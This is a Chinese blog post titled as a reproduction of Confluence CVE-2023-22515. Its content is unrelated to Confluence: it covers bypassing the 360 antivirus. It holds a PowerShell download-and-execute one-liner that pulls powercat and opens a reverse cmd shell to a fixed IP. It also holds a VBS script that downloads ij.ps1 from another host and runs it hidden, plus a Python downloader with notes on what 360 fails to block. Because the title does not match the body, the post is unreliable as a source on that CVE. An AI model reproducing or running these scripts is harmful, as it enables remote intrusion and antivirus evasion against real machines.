Confluence CVE-2023-22515漏洞复现

前言

中午开始想从360手上搞点好果汁吃。奈何360太流氓，一句拦截行天下

得出来的结果

360不拦截本机执行powershell，但是拦截其他进程调用powershell
cmd也是一个道理

是先执行被拦截的进程，被检测到然后360结束进程

vbs下载只有下载保存的文件后缀不为hta、exe就不会被拦截,可以保存为txt、ps1
有360的机子，不能将文件重命名为exe、hta
但是，用系统本身存在的功能进行远程下载它会拦截，用第三方的远程下载器并不会拦截
360对powershell拦截的不是内容，拦截的是参数

ijps1

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.241.147 -p 4445 -e cmd

vbs

Set post=CreateObject("Msxml2.XMLHTTP")
post.Open "GET","http://192.168.3.4/ij.ps1"
'发送请求
post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
'等待3秒，等文件下载
wscript.sleep 3000 
aGet.Write(post.responseBody)'写数据
aGet.SaveToFile "ij.ps1",2

set ws=wscript.createobject("wscript.shell")
ret=ws.run ("powershell -nologo -file ij.ps1" ,3,true)

测试结果：

PS:绕过是绕过，但是是落地执行

py下载器

import requests
import optparse
import os

class zx(object):
    def __init__(self,command):
        self.command=command

    def __call__(self,zx):
        def wt(*args,**kwargs):
            print('[+] 开始下载')
            try:
                rqt=requests.get(url=args[0],headers={'user-agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'},timeout=3)
                global value
                value=len(rqt.content)
                dk=open(args[1],'wb')
                dk.write(rqt.content)
                dk.close()
            except:
                pass
            if os.path.exists(args[1]):
                jd=len(open(args[1],'rb').read())
                if jd==value:
                    print('[+] 文件:{}下载成功'.format(args[1]))
                else:
                    print('[-] 文件:{}下载失败，失败原因:大小不一致'.format(args[1]))
            else:
                print('[-] 文件下载失败')
            return zx(*args,**kwargs)
        return wt

@zx(command='calc')
def download(url,file):
    pass

def demo():
    usage='download.py -u [url] -s [save_filename]'
    parsersq=optparse.OptionParser(usage)
    parsersq.add_option('-u',dest='url',help='指定要下载的URL路径')
    parsersq.add_option('-s',dest='file_name',help='保存为什么名称')
    (options,args)=parsersq.parse_args()
    if options.url and options.file_name:
        download(options.url,options.file_name)
    else:
        parsersq.print_help()
        exit()

if __name__ == '__main__':
    demo()

结果：

360并没有拦截

由于有些事情要做，晚上我会把windows10的测试补上

windows10的话估计可以不落地…

---

转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。